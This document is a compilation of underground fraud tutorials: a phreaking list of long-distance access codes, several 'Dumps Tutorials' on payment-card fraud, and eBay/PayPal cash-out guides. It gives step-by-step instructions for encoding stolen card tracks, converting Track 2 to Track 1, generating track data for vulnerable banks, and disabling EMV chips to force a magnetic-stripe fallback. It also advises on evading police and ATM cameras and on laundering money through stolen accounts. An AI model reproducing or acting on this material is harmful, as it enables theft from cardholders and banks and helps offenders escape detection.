+*= THE =* +**- APPLICATION -** +II.> Driver Information and the Application. +Quickly, there are 5 types of forms used by the DMV in processing such re- +quests as DL, ID, Replacement (of either), Computer paper & the renewal appli- +cation form (DL-1RN). BTW, according to this doc that I am sorta copying, it +says that the renewal process will and is being phased out with "the new system +now being installed". *CA has seen perhaps the very first of this 'new' system.* +13.011 +Every applicant for an original, or renewal, driver license whose form DL-44 +indicates previous driving experience, but who does not indicate or produce a +previous license, should be asked whether he/she holds a regular license from +California or any other state or country. The reason for the inquiry (Sec-12511 +& 12518vc) should be "politely" explained. Instruction or learner's permit & +"International Drivers Licenses" are not considered to be regular licenses. If +an applicant over the age of 18 cannot produce a valid or recently (within one +year) expired foreign license, a check by H-6 inquiry to the automated sys. +or Wats Line must be made prior to processing of the application. ++++H-6 inquiry to automated sys OR WATS line sounds like a hacking adventure!.. +Anyone with info on this possibility please fill us in at 800/755-3493 x-9657. +IV.> PART 5: +\|/ +?[>*C*H*I*P*=>! +/|\ +*P* - PHREAKING> +Intro: +950XXXX.LST +Here is a current list of operating L/D Co's, which provide access to +telco. lines across our fine country (ha!)... Of course what makes it so fine +is that with each of these L/D carriers, there is a code that is entered to be +able to access the fine features of each of these fine L/D service providers. +So someday with nothing better to do, give 'em a try and try out different +access code numbers (randomly), and hopefully you'll be able to make FREE phone + +calls in no time. Don't abuse it however, because they do tend to monitor any +high usage on these numbers. +[-------------------------------------------------------------------------] +| 950- | Code Format | Name of Company | Comments | +[-------------------------------------------------------------------------] +| 0223 | 6 digits + acn | Cable and Wireless | Business/calls overseas | +| 0266 | 7 digits + acn | Com Systems | MC/V/AE w/o exp-ok! Hit "0"| +| 0370 | 7 digits + acn | LDS | Long Distance Services | +| 0488 | acn + 13 digits| ITT | | +| 0511 | 6 digits + acn | Execuline | | +| 1022 | 0 + acn + 14dig| MCI Execunet | Calling card - 14 digit # | +| 1033 | 0 + acn + 14dig| MCI | Calling card - 14 digit # | +| 1044 | 6 digits + acn | Allnet | | +| 1050 | 6 digits + acn | Metrophone | | +| 1055 | 6 digits + acn | Telesphere | MC/V/AE ok too!! push "0" | +| 1407 | 7 digits + acn | TMC Watts #1 in CA | | +| 1408 | 7 digits + acn | TMC Watts #2 in CA | | +| 1444 | 9 digits + acn | Allnet | International Access also | +| 1555 | 6 digits + acn | Telesphere | | +| 1621 | 9 + acn + 6dig#| na | 9 + acn + 6 digits? | +| 1772 | code + acn | na | Voice for "access code" | +| 1820 | na | BizTel | | +| 1979 | 6 digits + acn | VorTel | | +| 1999 | 6 digits + acn | ITT | 800/275-0100 for account | +[-------------------------------------------------------------------------] +*** also worth noting here is that AT&T has a rather interesting 950 number. +It is 950-1288 (1ATT)! It is a carrier (modem) and runs up to 9600 baud, and +is 8N1. Try it out- it ain't easy neither!...e +Dumps Tutorial :#3 +Digit 1 (most significant): Interchange and technology: +* +0: Reserved for future use by ISO. +1: Available for international interchange. +2: Available for international interchange and with integrated circuit, +which should be used for the financial transaction when feasible. +3: Reserved for future use by ISO. +4: Reserved for future use by ISO. +5: Available for national interchange only, except under bilateral +agreement. +6: Available for national interchange only, except under bilateral +agreement, and with integrated circuit, which should be used for the +financial transaction when feasible. +7: Not available for general interchange, except under bilateral agreement. +8: Reserved for future use by ISO. +9: Test. +* +Digit 2: Authorization processing: +* + +0: Transactions are authorized following the normal rules. +1: Reserved for future use by ISO. +2: Transactions are authorized by issuer and should be online. +3: Reserved for future use by ISO. +4: Transactions are authorized by issuer and should be online, except under +bilateral agreement. +5: Reserved for future use by ISO. +6: Reserved for future use by ISO. +7: Reserved for future use by ISO. +8: Reserved for future use by ISO. +9: Reserved for future use by ISO. +* +Digit 3 (least significant): Range of services and PIN requirements: +* +0: No restrictions and PIN required. +1: No restrictions. +2: Goods and services only (no cash). +3: ATM only and PIN required. +4: Cash only. +5: Goods and services only (no cash) and PIN required. +6: No restrictions and require PIN when feasible. +7: Goods and services only (no cash) and require PIN when feasible. +8: Reserved for future use by ISO. +9: Reserved for future use by ISO. +Check this it out... i hope you will understand how to check it. +Example... to check 101 +101 = +1: Available for international interchange. +0: Transactions are authorized following the normal rules. +1: No restrictions. +Thats the meaning of 101 and how it will be authorized. +Dumps Tutorial :#4 +What do I need for real carding? +This is a very good question you will need some cash. And the following will be helpful but not required +at first. You should get these items at some point, but you don't need them right away. And I will tell you +why in next section. +Computer-laptop is best, as you can carry it with you on your op?s if you desire. If you don't have a +laptop you can use your home P.C. till you can afford to get one. Of course with home PC you cant take it +with you on your ops +Encoder - If you look around most every has or talks about an MSR206 this seems to be the preferred +encoder, but you can also use an AMC722. The AMC722 is usually cheaper and does the same thing. +Look on the net and you can find these for pretty decent prices. There is a internet company that will ship +overnight and you can send payment by Western Union. The have a special for $550.00 you get MSR206 + ++ Exeba Encoding Software + 50 loco or hico cards. Also XRAYSWIPE has pretty good deals on them +also and is a reviewed vendor. You can use Exeba Comm software or TheJerm has a software program +for the MSR206. +Laptop Bag - You can put your laptop and encoder in this also. Nice to have if you want to take your +laptop and encoder on op?s. +Power Inverter - Needed to run your encoder and nice to have if out for long period of time and laptop is +dying. You can get these just about anywhere even wallyworld. +Novelty Id - This should be at the top of your list as one of the first thing?s you should get. You will need +this at some point you do not want to use your real info. I repeat do not even for 1 time use your real +information. There are some good vendors that are quick also. Just look under the reviewed vendor +section for more details. +Dumps - Get them from zeusk. You can get classic, gold, platinum, world, business, signature etc. If this +is your first time you may want to get classic and start by shopping for low end items. IE anything under +$200-$500. Now classics working not good and will go for 1 or 3 times that but the general rule of thumb +is under $300 and you should be okay. Gold and Platinum for items above $500 but say to $1,000 and +Business, Signature $1,000 and above. These are just suggestions and not hard rules. +Track 1 and 2 or just Track2 - you can get from zeusk. If you just have track2 only you can generate track +1 with PCKit-track1 generator. You will want to encode both tracks to your card. Making sure to change +the name on the dump. Some stores only use track2 but it's best to stay safe and encode both. +Dump Example +Track1 B410000000000000000000^REGAN/RONALD^0409XXXXXXXXXXXXXXXXXX +Track2 41000000000000000000=04091XXXXXXXXXXXXXXXXXXX +You of course change the name on track1 to your Novelty last name and first name. +Plastic cards to put dumps on: Okay again never use your own card to encode onto, just not the best idea. +You can get cards from just about anywhere, some drugstores sell prepaid cc's, you can try that or get a +Visa or MasterCard branded gift card. Most malls carry this type of GiftCard. Simon Cards have been +used a lot in the past so I would suggest staying clear of those. The best way Buy from plastic vendor. +Wallet-You will need extra wallet to store you novelty items. You don?t want to use your own wallet and +keep having to take you real cards and id out and replacing them with your novelty. +Anon Phone-Don't really need but if you have a phone merchant you can call from anon cell before going +to use your card. +You don't need everything I have but they all are helpful. +Quick Start Up: Okay so you don?t have the time to wait to get all your tools or maybe your cash flow is +not flowing. You may ponder how can I get up and going as quickly and cheaply as possible. +Answer: You can buy dumps from reviewed vendor of course and buy plastic from plastic vendor. Most +plastic vendors will encode your cards for you. This may be the cheapest way to go. Say you buy 5 dumps +for $50.00 = $250.00 and 5 plastic for $75.00 =$375.00 total for both $625.00. Add a drop to that $50.00 +and for $675.00 you will be ready to go. Another advantage with going this route is you will have +matching plastic. The plastic vendor will emboss your plastic with your novelty information. If you don?t +have a lot of funds try taking a cash advance on your own card. You will be able to repay it rather +quickly. + +Okay I finally got everything, I'm Ready to go Right? +Answer: Okay hang on there Skippy, you may think you are ready but are you?? +Get into The Correct Frame Of Mind: Remember you are the Cardholder this is your card and you will +treat it as such. Repeat 50 times then say back words 25 times, lol, Just kidding but you are who you say +you are. This is your card don?t be scared this is your card. Who?s Your Card? Also a good idea to be +aware of what your novelty id says. Know the address etc, this will help you feel more at ease and will +help if cashier ask off the wall question. Be prepared go over in your mind how different scenes might +play out and have good sensible answers. +Remember the customer is always right, Never let them think you?re not legit even if they throw it in +your face. +Pick Your Poison! (Where should I shop) +If you are a Newbie you should try stores with self swipe checkouts. Just beware some of the self swipes +will verify your id. Also if you want to get your feet wet grocery stores with self swipe are real nice. They +even have the ones that you ring up your own shit and pay without any cashier present. +Gas Stations- I would suggest staying away from gas stations. Most have cameras and why risk someone +getting your car info for such a small purchase. Plus some dumps will die quickly when using a Gas +Station. +Using Cards with non-matching last 4- Simple shop at stores that do not check last 4 or use AVS or type +in CW2 I?m not going to post which stores do and do not at this time. If you don?t know any off hand go +there in person and use your legit card and watch what they do. +Cards with matching last 4- Shop anywhere that doesn?t have AVS or type in CW2 I will not list any +stores you will have to do your own research. +What is AVS? +Address Verification System- verifies cardholders real addy, sometimes only uses zipcode. +Security- This is a very important topic, and here are some tips. First never park in front of store in which +you are shopping. If someone gets suspicious of you they may write down your license plate or if they +have cameras outside they may catch it on there cameras. Always park far enough away that the store cant +see which car you got into. If possible park around a corner or have someone else drive and wait out of +site for you. If you are using the buddy system You can get some 2 way radios or both keep cell phone on +you and if shit hits the fan you can sprint away and have the car meet you somewhere nearby. Never run +directly toward your car if shit hits the fan and you have the run, then security is probably running after +you. See planning for more information on this. Also you may want to carry a small can of mace or +pepper spray key chain size etc. This can be used to get your freedom from security but may lead to more +charges if your caught. +Planning- Okay You are now just about ready to go. +1. What area will I be shopping at and what stores- Best to know in advance you can make driving +directions to the area and from store to store. This is nice and will sped up the time your in one area. +Helps you find the quickest way to and from area also. You don?t have to go this route you can go what I +would call this free styling. +2. Once you spot your store find good parking spot away from camera out of view from store. Look +around what will you do if shit goes wrong. A good rule of thumb is never run directly toward your car. + +You can park around the corner in next parking lot over. If shit hits fan you can exit store go in opposite +direction and loop around behind the store to your car. Unless your 500 pounds and cant run in which if +you try this method you may bet caught if you have to run. +3. Bring other Shirts with you. This is nice, you can change your shit when shopping at different stores +this will help you keep much safer. And if your being chased you can take one off and have the other one +underneath. +4. Most of the time you wont have any problems and you may tire of parking so far away, you tell +yourself I?ve done this 100 times and no problems. But never let your guard or security down. This is +what keeps you safe plus it?s good to walk a bit for heath reasons. +5. Keep them guessing, some people wear hats and sunglasses. My advice don?t wear sunglasses inside it +only makes you look shady. A easy way to change your appearance is to use real glasses. If you don?t +wear glasses use Stage glasses these look like regular lenses but are clear with no prescription. If you +already wear glasses try different frames or use contact lenses. Also you can change your facial hair, grow +a mustache or a goatee or beard. Then shave it off after sometime and go bareback etc. These are ideas to +change your appearence. +6. Dress the part, dress to fit in, you don?t want people to remember you. +7. Always shop a good distance from where you live. You don?t want them to catch you on camera and +put a picture of you on the news for your family or friends to see. Also you don?t want to go back to the +same stores using your legit information. It?s unlikely they will catch you but you can never be too safe. +Okay I?m ready +Okay you have your cards and dumps, you planned your op out and you have got your mind ready to go +what?s next? +Shopping- Yeah let?s go, Remember this is your card. Be confident and act normal. Pick out your product +proceed to cashier and check out. Choosing your cashier is vital and you will get rather good with this as +you go from what I have heard. Usually younger females are the best. You want them to process you like +everyone else. Make them feel they have no reason to ask for more information like id etc. If they ask for +id show them , keep in your wallet and just hold it for the can see, +If they ask to see your card to compare signatures let them do it but keep you hand held out till they give +it back. Start small and grow slowly , take time to learn the ropes and it will pay off for you big time. +Also if you card is declined it?s a good idea to carry a backup with you. You can tell them you might +have overdrawn your account or limit and tell them you will try another card. If your 2nd card is declined +or you don?t have one. Tell them you will go to bank or go get your checkbook etc. If for some reason +you get a pick up card tell them you wife or girlfriend lost her card and reported her?s lost and you forgot. +99% of the time they will say okay. You can then try another card or tell them you will be back with +checkbook. +Call for authorization- if this happens tell them you in a hurry and don?t have the time to deal with that or +tell them your card must be over the limit and you don?t want to purchase the item now. Act as a +cardholder would act embarrassed. Whatever you do don?t go through with the call especially if they +have your card in there hand. +What to stay away from- If you are new don?t try carding a laptop right away. Start small , I would +suggest staying away from high fraud items IE laptops and electronics. Also stay away from high security +stores i.e. BB and CC. And stay away from malls they have more security then you need to deal with in +the beginning. +I will try and update this from time to time, feel free to give your input. Thanks and good luck! + +Dump Tutorial :#5 +The following article explains practically how vulnerable banks are in the operation of ATM cards. ATM +cards (Credit cards) usually has a magnetic stripe that contains the raw data called tracks for its operation. +The physical layout of the cards is standard. The LOGICAL makeup varies from institution to institution. +There are some generally followed layouts, but not mandatory. +There are actually up to three tracks on a card. +Track 1 was designed for airline use. It contains your name and usually your account number. This is the +track that is used when the ATM greets you by name. There are some glitches in how things are ordered +so occasionally you do get "Greetings Bill Smith Dr." but such is life. This track is also used with the new +airline auto check in (PSA, American, etc) +Track 3 is the "OFF-LINE" ATM track. It contains security information as your daily limit, limit left, last +access, account number, and expiration date. (And usually anything I describe in track 2). The ATM itself +could have the ability to rewrite this track to update information. +Track 2 is the main operational track for online use. The first thing on track to is the PRIMARY +ACCOUNT NUMBER (PAN). This is pretty standard for all cards, though no guarantee. +Example of Track1 +B4888603170607238^Head/Potato^050510100000000001203191805191000000 +Example of Track2 +4888603170607238=05051011203191805191 +Usually only track1 and track2 are needed to exploit the ATM card. +Let us examine track1. +Take the Credit Card account number from Track 2 in this example it +is:4888603170607238 and add the letter "B" in the front of the number like +this B4888603170607238 then add the cardholder name YOU want to show on the +card B4888603170607238^Head/Potato^(Last name first/First Name)next add the +expiry date and service code (expiry date is YYMM in this case 0505,and in +this case the 3 digit service code is 101 so add 0505101 , +B4888603170607238^Head/Potato^0505101 +No add 10 zero's after service code: +B4888603170607238^Head/Potato^05051010000000000 +Next add the remaining numbers from Track2 (after the service code) +B4888603170607238^Head/Potato^050510100000000001203191805191 +and then add six zero's (6) zero's +B4888603170607238^Head/Potato^050510100000000001203191805191000000 this is +your Track 1 +Track 1:B4888603170607238^Head/Potato^050510100000000001203191805191000000 +REMEMEBER THIS IS ONLY FOR VISA AND MASTER CARD(16digits) , AMEX HAS 14 +DIGITS, this doesn't work for Amex + +FORMAT FOR TRACK2 +CC NUMBER: YYMM (SERVICE CODE)(PVV)/(CVV) +Here is the Fleet's credit track2 dump: +4305500092327108=040110110000426 +we see card number, an expiration date, 1011 - service code, 0000 is the place for pvn (but it is absent!), +and at least 426 is the cvv (do not mix with cvv2) +Now let's take a look on MBNA's track2 dump: +4264294318344118=04021010000044500000 +here we see the same - no pvn's and other verification information -just a cvv. +As clearly shown above it is possible to generate track1 from track2 using the method shown above. +However track2 gen software automates the process. +The major process of getting the track2 info is through skimming. Fraudulent POS (Point of sale) +merchants can use handheld devices called skimmers to read off and download the tracks data from your +credit card if you are not careful. This is the main method of obtaining the original tracks from the credit +card. +However this article will focus on the exploitation of ATM cards using credit card info such as Credit +card number, cvv2, Exp date and PIN and then using algorithms commonly called ALGOS to generate +the track2. These credit cards infos are normally obtained by spamming. There are a lot of reviewed +[censored] who sells these infos in some carding forums. +Now it is interesting to note that there are a lot of talks about track2 generation possibility. How much is +it real? However in my own candid opinion, it is very possible to generate track2. The simple truth is this. +Generation process of debit (and some credit) dumps from the credit card number, expiration date and +cvv2 code becomes possible because of the banks’ weak, "nonsaturated" structure and the banks failure to +actually carry out proper validation of the track2 info. It might interest you to know that about 10% of +banks are vulnerable. This vulnerability called pvv loophole have been fixed for the major banks But still +sometimes the idiocy and negligence shown by employees of many American (and not only) banks quite +often continues to surprise all: about 10% of issued cards still vulnerable, even for the moment. +During the last 2 years I have come to discover so many banks which are still vulnerable to this attack. +This forms the basis of this article. Armed with the right tool, you can actually encode cards using cc +number, cvv2, Exp date, PIN and the algos. +Now what is the nature of the algos you might ask? I will give you a sample. +518445**********=YYMM10100000000779 +529107**********=YYMM10100000000CVV +These are track2 info. The RHS is the card number. YYMM is the exp date +( year/month) and the CVV is the card verification value. The first 6 digits of the card number is called +the BIN . You only neeed to know if the BIN is casahble or vunerable to use the Algo. +Below is the screenshot of the Algo list I have compiled and tested to work 100% ( About 800) . +Because some banks fail to actually validate the full track2 info, it is possible to use track2 generators +softwares to attack the BINS. You simply enter the credit card number, cvv2, exp date and you get the +generated track2. Remember this only works for weak BINS or cashable BINS. To test if the track2 you +have generated is working before practically going to the ATM with the PIN to cash out, it is important +you check the track2 using online checker. This will save cost for your embossed cards and it will be +safer for you. I can offer you this service at a modest price of $3 for one track2 info. If you get 00 +approval code and you have the right PIN , you will have about 97% success. + +Dumps Tutorial :#6 +Short tut, on how to make track one with track 2.. +couple days ago i was looking how to do this, found a way,and just want to post if it may help anyone..I +know kreenjo offers a gen, but maybe you are not sure if he is keep logs on it....or maybe you just want to +know if gens ever go down... +Take example of last dump Track2 (this is a dump): +Example dump info: 4888603170607238=05051011203191805191 PATACSIL/DAVID Bank +of America, N.A. (USA) CREDIT PLATINUM United States of America +4888603170607238=05051011203191805191 <----This is Track 2 (we want to make +Track 1 out of Track 2 +Head/Potato <---the name of the card holder (LASTNAME/FIRSTNAME) +Bank of America, N.A. <-- Bank Name +(USA) <--- Country of Bank +CREDIT <-- Credit or Debit ( in this case it is Credit) +PLATINUM <--type of card, eg. Classice, Gold,Platinum +United States of America <--Country +When you see and equal sign (=) in a Track it always means it is Track 2 +When you see the letter (cool.gif in front of the Track it is always Track 1 +Now to Make a Track 1 From Track 2 see instructions below (there are online +web sites that do this but it's good to know the basics of doing it , just +in case you can't get to an online web connection) +Take the Credit Card account number from Track 2 in this example it +is:4888603170607238 and add the letter "B" in the front of the number like +this B4888603170607238 then add the cardholder name YOU want to show on the +card B4888603170607238^Head/Potato^(Last name first/First Name)next add the +expiry date and service code (expiry date is YYMM in this case 0505,and in +this case the 3 digit service code is 101 so add 0505101 , +B4888603170607238^Head/Potato^0505101 +No add 10 zero's after service code: +B4888603170607238^Head/Potato^05051010000000000 +Next add the remaning numbers from Track2 (after the service code) +B4888603170607238^Head/Potato^050510100000000001203191805191 + +and then add six zero's (6) zero's +B4888603170607238^Head/Potato^050510100000000001203191805191000000 this is +your Track 1 +Track 1:B4888603170607238^Head/Potato^050510100000000001203191805191000000 +REMEMEBER THIS IS ONLY FOR VISA AND MASTER CARD(16digits) , AMEX HAS 15 +DIGITS, this doesn't work for Amex +Dumps Tutorial :#7 +It applies mostly to the US, but others can pick up some tips too. +How to cash out Dump + PIN and sleep peacefully at night, what is there to fear? And the most +importantly – how are they trying to find us? +I’m sure everyone has their own methods and approaches, so we will not state that we are smarter then +anyone else. We will simply tell about our approaches and applied tactics then everyone will make their +own conclusions. I will only say that observing our rules and approaches, through the past 3 years, not +one of our fighters has been caught. +1. The fastest and most productive way. We use it only for large amounts of a material, but unfortunately +for the majority this is out of reach as it requires big capital investment. Not everyone can use this +method, but for the general picture we have decided to share it. +Group or one person working on motorcycles. +Amounts that we did in half a day using motorcycles was 10 times greater than what the same group can +execute in 3 days using cars. The point is that we can drive up to the ATM without even getting off the +bikes. Black bike, black helmet - there are thousands of those in the city. Of course the bikes are without +license plates and exclude any unique features. +For example ... All of our bikes have a toggle-switch for turning off the back light. In case if anyone +follows you at night, you can become invisible almost momentarily. To give you an idea of what we do +during daytime - we use 2 groups on 3 bikes each. Only 2 bikes are cashing and the third one just rides +around. In case of danger during the routes – if COPS want to pull over one of the 2 bikes, 3rd bike will +speed up or do some sharp movements (as it seems to COPS). Of course COPS will focus all of their +attention on the escaping bike leaving alone the other two (filled with money and cards). So far COPS had +no luck catching the escaping bike ) we use "turbo charged HAYABUSA" motorcycles, but even if they +do catch up ... maximum they can give a speeding ticket, because that driver has nothing on him. We +always leave a car near to the place of work. It is very convenient – just stop by for a few minutes every +so often to drop off the money and empty cards. +This method is very effective but only for large cities, besides not everyone can drive a motorcycle and I +am not even talking about their price. + +2. Using a PICK UP TRUCK. All charm of this method is that it enables to hide the license plates easily +and the most importantly - legally. Trucks overflow US roads, as they are very common and easily +accessible. They do not attract much attention and can be easily lost in sight. Alright ... Everyone knows +that in the US driving a car without front license plates is not a huge offence and COPS usually do not +pay attention to that. But we still have the back license plate!? We pull down the trunk door and drive the +car with an open trunk ... In this case the license plate is only visible to other drivers but absolutely not +visible to cameras located on buildings. This allows parking near the ATM and accelerates your work. +Plastic. +Never use plain/ white plastic. It is not safe for many reasons. Someone can notice it and understand +what’s going on. If cops will find it – they will know what it’s used for right away. And most +importantly ... if such card is retained by the ATM and in the evening when workers take it out – they will +understand what it is, they can make a police report and give it for examination which would reveal your +finger prints. Just go to any grocery store and pick up some GIFT CARDS for example VISA or MC. +These cards don’t draw attention of any passer-bys; if COPS will find them, they will see them for what +they are – gift cards, and the most importantly ... When workers will take it out from the ATM (if the card +was retained), at least 10 people will touch the card – holding it in their hands and trying to figure out +what moron wanted to take out CASH from a GIFT CARDS. At least this card will not go straight into a +plastic bag for examination. +NEVER WRITE ON THE CARD!!!! Lately COPS are instructed on different signs to pay attention to in +case of credit card detection. And so believe me... they examine each card at least for good 5 minutes. +And God forbid a PIN is written on it. Use labels or mark the cards and keep the PINs separately. +ATM!!! +There are about 10 different kinds. Study them before beginning your work. If you see a small mirror - +90% chance that there is a CAMERA behind it. You see the black plastic square built into the panel by +the pin pad or located by the monitor - 100% it’s a camera. You can’t hide from it but you can easily +cover it with a sticker or something else. Cameras do not record all the time ... They start only after you +have inserted the card in the ATM. Also, they shoot 15 frames per second - not 24 ... meaning that at +reproduction the image recorded by the camera will be time-lapsed. And even if your face has got into the +shot – don’t worry. It is impossible to find someone by the picture. ATM camera in mainly used for: +when the card holder calls to the bank claiming stolen money - bank does an investigation and looks at +the recordings from the camera. In 50% of the cases stupid Americans take their money themselves and +then declare that someone has stolen it. Then bank tells the Americans about the cameras in the ATMs, +and that the cardholder took out the money himself; and if they continue doing this - they can end up in +prison. Therefore no one will search for the face in the camera shot. However if your license plates will +get in the shot - that’s a different story. +Storage of cards!!! +Never keep all of the cards in your pocket. Hide them all in the car and take with you only the ones you +will be using. By the law US COPS can search you in the street or for any small traffic violation. +However, they cannot search your car. In other words ... for example they stopped you and searched you, +if they have not found anything in your pockets - they will ask you to search your car. You can safely say +NO!!! If you don’t have any pending warrants and nothing in your pockets – they would need a warrant +to search your car. And they cannot get a warrant without a valid reason!!! We had a case when we were + +searched and asked to search the car ... We refused! After which the obnoxious COP said: we will now +request a search warrant from the police department and will search your car. We nodded our heads and +politely asked to sit in the car. In 20 minutes the COP told us that he is dispatched to an urgent call, threw +our documents in our car and left. Clearly, no one can give him a search warrant without a legitimate +reason. Before starting your work – get very familiar with the local laws. +Try to keep all of the cards hidden and the less possible on hands. However, if you are getting pulled over +by COPS and you have a small amount of cards on hands - the best way is to dump them into the car +door. When the window is open, there is a crack between the glass and the metal. Dumping the cards +there - they fall directly inside the door. To get them the door would need to be disassembled and no one +(COPS) would do that without a reason. +Communication facility!!! +Never keep your personal cell phone with you, as it is constantly registers by the operator – tracking your +movement. For communication use only new phones activated specially for work and do not call +anywhere besides another phone with the same purpose. Another example … for example your mobile +phone works only with one operator (as previously iPhone) and approaching the ATM you are holding it +in hands. Believe me, those looking for you can request the phone operator for all phone numbers which +were registered in this region at that time ... Certainly the list will be long, but on the next report which +they will request on another location (where you cashed out another ATM) same phone number will be +precisely visible - the phone number which was in both places during required time.... +Work in different city/ state. +Always remember that any card will work better at home. I am not even talking about REGION +BLOCKS which is a big deal. And so … If the card is from one state and you start cashing it in another – +the protection on UNUSUAL ACTIVITY works instantly and the bank will most likely call the +cardholder. If the card is cashed in the same state - it will work much longer. It is already proven by us. +So if you have a large amount of material from one place – think about it, maybe it’s worth going there. +Another very important detail. When the cardholder calls his bank claiming someone stole his money - +bank automatically sees the cardholder as suspected #1. Because the bank doesn’t understand how and +who can know the PIN code, that is known only to the owner. Maybe the bank understands, but it is +easier to politely refuse giving a refund to the card holder due to lack of the INFORMATION +CONFIRMING INNOCENCE of the OWNER. Sounds ridiculous, but it so ... the cardholder has to +convince the bank of his innocence. That’s why ... If you cash the card in other state - it will be easier for +owner to prove that it wasn’t him. If the bank knows that the owner is not guilty – they will start +searching for the one who is. Well and if you bombed a card in a place of its residence – it will be hard +prove cardholder’s innocence and accordingly nobody will search for you … and if they will – it won’t be +soon. +I think everyone knows how to find out where the card is from. +Overlook your surroundings. +We always take a couple of days to examine local surroundings before starting work. During these couple +of days we map out good/ rich and bad areas. We plan routes in advance: observe what time and how +many COPS patrolling the area, also looking at the arrangement of banks and stand-alone ATMs. We find +out where the bars and night clubs are located … In the evening there are many people – that is what we + +need. If you work at night we do not recommend using ATMs located in non-crowded places. Always +remember that a patrol car can show up anytime and if you the only alive person in their sight – you will +catch their attention. I recommend going to STRIP CLUBS ... you can look at the girls and the ATMs are +good there. The limit on withdrawal is higher than in bank ATMs and anybody will pay attention if you +take money from 4-5 cards. That is a normal phenomenon there. +Dumps Tutorial :#8 +Today we discuss a little about 201 dumps - a lot of peoples just running away once they seeing terrible +number 201. Feel easy - things not so terrible. +First of all i would like to say that write 201 dumps on the chip it is not a fantastic, but is real things, and +actually not so hard to do. But i want to discuss another thing - i would like to give you a hint how to use +201 dumps everywhere - even in such places where pos terminal requires chip... +Lets begin... +First thing we should have is a card with chip and magnetic stripe.Then we have to look pretty in the +home for 12V AC adapter. Found. Good. Now all we have to do is to scratch a little chip metal contacts +with + and - of the adapter. Seeing nice sparks - sign of good work ;-) After this little surgeon chip is not +working anymore and this is extractly what we need. Now we have to encode 201 track to the regular +magnetic stripe of the card and safely go to shop... Once the seller trying to insert the card with the chip +he/she gets a nice error (additinally you can give him a reason that you washed your wallet with the card +and chip is not working), and now most interesting part - once the terminal detects that chip is not +fucntioning it switches back to magnetic stripe mode and allows you to swipe the card, all you have to do +is to persuade the cashier to do it. +Ebay + Paypal Cash out +Hey, today I would like to teach you a simple but effective method. +In this method, you need two PayPal accounts and two eBay accounts. +Step one: You buy a PayPal and an eBay account off someone. The PayPal should be verified and linked +with a CC. The CC needs to have a high limit. +Step two: Sign in to your personal eBay account and list a product that costs like 300$-4000$. +Step three: Sign in with the stolen eBay account and buy the product with the stolen PayPal that you +listed. Verify the transaction with the stolen eBay account, and feedback to your real eBay account. +Step four: Take the money to your eBay account and spend it to whatever you like. The person will not be +able to charge-back because you accepted the payment with the stolen eBay account. +That's all it takes to do this guys! +Happy carding! + +• Hey, today I would like to teach you a simple but effective method . +In this method, you need two PayPal accounts and two eBay accounts. +Step one: You buy a PayPal and an eBay account off someone. The PayPal should be verified and +linked with a CC. The CC needs to have a high limit. +Step two: Sign in to your personal eBay account and list a product that costs like 300$-4000$. +Step three: Sign in with the stolen eBay account and buy the product with the stolen PayPal that +you listed. Verify the transaction with the stolen eBay account, and feedback to your real eBay +account. +Step four: Take the money to your eBay account and spend it to whatever you like. The person +will not be able to charge-back because you accepted the payment with the stolen eBay account. +That's all it takes to do this guys! +Happy carding![/quote +More explanations needed +***Withdraw / Cashout from Limited Paypal *** +Do you have Paypal account with a positive balance and need to Cashout stucked Fund? +Do u have Paypal Account with Limited Access ??? +Is it over 180 days old? +Did u recive the email to withdraw funds? +Do u have more than 100$ in your account? +If all "YES" send me a message from contact us or knock on live chat , i can cash out from your forgoten +paypal account +How will i pay - PayPal,Neteller , VCC , LR ( For LR ,Additional exchange fee applies ) +How long will it take? - 3 - 5 Days +How much i charge? +Fees: +50 - 100 - 60% +101 - 500 - 55% +500+ - 50% +Note + +1. 180 days older paypal +2. Don't ask me to pay first +3. Sometimes the process fails due to paypals failed transfer, if such case we are not responsible. +4. Don't ask to cashout hacked account, I will block your contact +Details - +The account must have a positive balance , prefferably 100+ +Please note, if the account is limited, 180 days (6 months) must have passed since the limitation. +Sometimes this only takes 45 days, message me for details. +You will receive the remaining balance, as soon as the funds clear. +I will follow up with messages at least once a day. +You will get and payments as quickly as possible. +This service is available for every country in the world. +This is a one time deal, if you need ongoing withdrawals, please message me. +I will not give you cash up front. Don't ask. +If you need a different form of payment, just ask. +Accounts must be yours, I will not cashout hacked/stolen accounts. +Please message me to get started! +To attend live chat or see further details , visit: +verifypp .com +Or Add me in skype : Miskat.thamid.aziz +Ebay Tutorial +This article is mainly for beginners who still don’t know how to begin. +So first you should do – learn language you’re going to communicate with customers well. If you can’t – +forget about auctions. Selling – it’s communication firstly. And you won’t be able to sell anything +without communication. +So you’re newbie, don’t have experience, money. Too bad. Anyway if you don’t have knowing friend +you need some money to but accounts, cvv’s, socks. +I’d like also to add a few words about technical aspects of working with eBay. For successful work will +be enough if you’ll have IP address of country you work with, it’s not obligatory to be the same as +holder’s city. Also eBay doesn’t check system language, time. I recommend you to make not the GMT -8 +time as it has main eBay office. It’s also possible to use yahoo mail server. +Seller’s account registration. +Besides common data you’ll be asked to enter Primary telephone, Secondary telephone, Date of Birth. +You should enter the number which doesn’t belong to holder but belongs to the same geographical +position. It’s not recommended to use “always-busy” numbers – eBay has a database of such numbers and + +you’ll be asked to verify your number. The same about toll-phre and cell phones (but not always). If you +have an account with enough amount of feeds, it’s worth to order a phone number in USA and use it also +for communication with buyers – and it could be a point of successful deal. You can use it and for +unlocking of your account if it will be temporary blocked. +After you’ll confirm your registration by clicking the link in the letter – you’ll receive fnctional buyer’s +acc with 0 feedbacks. Next press “sell” button to register as a seller. You’ll be asked to enter holder’s and +his card’s data. Also you will have to enter the data of holder’s checking account (bank name, routing, +and account’s number). Of course we don’t have holder’s bank account. And we don’t need it. It’s +enough to find bank name by BIN look up and find routing number of this bank. Further you can enter +random number. But if you’ll enter bank account which was already registered before – be ready that +your fresh account will be locked on the next day. +Lots posting and selling process. +With fresh accounts you can: +1. Post lots with cheap stuff; +2. Promote them a little and post more expensive stuff. +It’s better to do lots posting from 5AM to 9 PM PDT as in another time all law-following civilians are +sleeping. The same about time of contact with buyers (phone and email). Sellers themselves recommend +to post lots from 5 PM to 7 PM (PDT) as buyers activity is the best at this moment. +Accounts promotion. +For accounts promotion you’ll need a little imagination and patiens, +Remember that first 30 days after registration you’ll have “beginner-mark” near your user ID. Such +accounts almost useless for work as it attracts buyers’ suspicions. So this time you can promote it or just +forget about it or a month. +Firstly on most of new accounts new cheap stuff is posting, better “was in use”. Further you buy it from +your buyer’s accounts and receive some positive feedbacks. It’s enouth 1-3 such feeds to be possible to +post more expencive stuff. +In case if your lot will be won by real buyer you should work a little more to get rid of him. Of course +you can change registration data and 